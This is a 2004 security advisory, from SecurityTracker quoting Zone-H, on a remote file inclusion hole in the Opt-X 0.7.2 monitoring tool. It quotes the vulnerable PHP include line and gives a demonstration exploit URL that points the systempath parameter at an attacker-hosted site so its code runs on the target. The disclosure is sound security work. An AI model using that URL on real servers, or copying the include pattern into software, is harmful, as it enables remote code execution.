Opt-X Include File Hole Lets Remote Users Execute Arbitrary Code on the Target System
|
|
SecurityTracker Alert ID: 1009194
|
|
CVE Reference: GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Feb 24 2004
|
Impact: Execution of arbitrary code via network, User access via network
|
Exploit Included: Yes
|
Advisory: Zone-H
|
Version(s): 0.7.2
|
Description: G00db0y from Zone-h Security Labs reported an include file vulnerability in Opt-X. A remote user can execute arbitrary PHP code on the target system.
It is reported that the '/includes/header.php' file includes the '/includes/menu.php' file relative to the $systempath variable.
A remote user can specify a remote location for the $systempath variable to cause '/includes/menu.php' on the remote location to
be included and executed on the target system with the privileges of the target web service.
A demonstration exploit URL is provided:
http://[target]/path_of_optx/i
ncludes/header.php?systempath=http://[attackersite]/
The vendor has reportedly been notified.
|
Impact: A remote user can cause arbitrary PHP code, including operating system commands, to be executed on the target system with the privileges of the web service.
|
Solution: No solution was available at the time of this entry.
|
Vendor URL: www.opt-x.org/ (Links to External Site)
|
Cause: Input validation error, State error
|
Underlying OS: Linux (Any), UNIX (Any)
|
Reported By: <zetalabs@zone-h.org>
|
Message History:
None.
|
Source Message Contents
|
Date: Tue, 24 Feb 2004 12:34:47 +0100
From: <zetalabs@zone-h.org>
Subject: ZH2004-10SA (security advisory): file inclusion vulnerability in
|
ZH2004-10SA (security advisory): file inclusion vulnerability in Opt-X
Discovered: 10 february 2004
Vendor contacted: 15 february 2004
Published: 24 february 2004
Name: Opt-X
Affected System: 0.7.2
Issue: file inclusion vulnerability
Author: G00db0y from Zone-h Security Labs - g00db0y@zone-h.org - zetalabs@zone-h.org
Vendor: http://www.opt-x.org/
Description
**********
Zone-H Security Team has discovered a flaw in Opt-X. There is a vulnerability in the
current version of Opt-x that allows an attacker to influence the include path for PHP
scripts. This cuold be exploited to include a malicious script that is hosted on an
attacker-controlled server. allowing for execution of arbitrary code in the context of
the web server. "Opt-X is primarily a network monitoring tool for content/urls and network
services, but it also has some other functions such as, task list, server list,
log changes for servers and a vendor list".
Details
**********
There's a file inclusion vulnerability in the /includes/header.php file, line 57:
<?php include("".$systempath."/includes/menu.php"); ?>
Is it possible for a remote attacker to include an external file and execute arbitrary
commands with the privileges of the webserver (nobody by default).
To test the vulnerability try this:
http://vulnerablesite/path_of_optx/includes/header.php?systempath=http://attackersite/
In this way the file "http://attackersite/includes/menu.php" will be included and executed
on the vulnerable server.
Solution
**********
The vendor has been contacted and a patch was not yet produced.
---
G00db0y from Zone-h Security Labs - g00db0y@zone-h.org - zetalabs@zone-h.org
http://www.zone-h.org/en/advisories/read/id=4036/
|
|
